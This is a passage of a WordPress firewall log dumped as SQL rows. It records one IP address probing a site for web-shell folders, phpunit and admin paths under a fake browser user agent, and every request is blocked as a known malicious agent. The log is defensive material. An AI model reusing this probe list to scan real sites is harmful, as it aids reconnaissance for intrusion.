User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134140,1699994828.680618,1699994828.671300,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQv\",\"category\":\"brute-force\",\"ssl\":1}'),(134141,1699994827.104854,1699994827.095200,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/user/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3VzZXIv\",\"category\":\"brute-force\",\"ssl\":1}'),(134142,1699994825.318587,1699994825.309200,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/network/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL25ldHdvcmsv\",\"category\":\"brute-force\",\"ssl\":1}'),(134143,1699994823.771681,1699994823.750200,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/meta/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL21ldGEv\",\"category\":\"brute-force\",\"ssl\":1}'),(134144,1699994810.913445,1699994810.904400,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134145,1699994809.405133,1699994809.390500,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wordpress/wp-includes/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1pbmNsdWRlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134146,1699994807.635134,1699994807.626300,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wordpress/wp-content/uploads/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1jb250ZW50L3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134147,1699994805.814798,1699994805.806000,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wordpress/wp-admin/includes','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1hZG1pbi9pbmNsdWRlcw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134148,1699994803.724895,1699994803.716100,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/vendor/phpunit/phpunit/src/Util/PHP/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3ZlbmRvci9waHB1bml0L3BocHVuaXQvc3JjL1V0aWwvUEhQLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134149,1699994802.125403,1699994802.116700,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/uploads/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134150,1699994800.132402,1699994800.117600,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/upload/image/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZC9pbWFnZS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134151,1699994798.534189,1699994798.520200,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/twentyfifteen/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWZpZnRlZW4v\",\"category\":\"brute-force\",\"ssl\":1}'),(134152,1699994796.608084,1699994796.598500,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/sites/default/files/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134153,1699994794.873949,1699994794.864600,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/images/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ltYWdlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134154,1699994793.370549,1699994793.361100,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/cgi-bin/assets/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NnaS1iaW4vYXNzZXRzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134155,1699994791.914208,1699994791.898400,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/cgi-bin/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NnaS1iaW4v\",\"category\":\"brute-force\",\"ssl\":1}'),(134156,1699994789.851243,1699994789.829400,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/blog/wp-includes/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Jsb2cvd3AtaW5jbHVkZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134157,1699994787.897618,1699994787.887200,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/assets/images/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Fzc2V0cy9pbWFnZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134158,1699994786.149780,1699994786.141100,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/admin/controller/extension/extension/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134159,1699994784.446857,1699994784.438000,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/WordPress/wp-admin/includes/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L1dvcmRQcmVzcy93cC1hZG1pbi9pbmNsdWRlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134160,1699994782.930024,1699994782.921300,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/ALFA_DATA/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134161,1699994781.205524,1699994781.196800,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/.well-knownold/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3dub2xkLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134162,1699994779.364155,1699994779.355500,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/.well-known/pkivalidation/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3duL3BraXZhbGlkYXRpb24v\",\"category\":\"brute-force\",\"ssl\":1}'),(134163,1699994776.631127,1699994776.621200,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/.well-known/acme-challenge/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3duL2FjbWUtY2hhbGxlbmdlLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134164,1699994773.208183,1699994773.198800,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-templates.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLXRlbXBsYXRlcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134165,1699994771.576097,1699994771.567400,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-previews.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLXByZXZpZXdzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134166,1699994769.771602,1699994769.762900,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/template-canvas.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RlbXBsYXRlLWNhbnZhcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134167,1699994768.011546,1699994768.002200,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/style-engine.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie 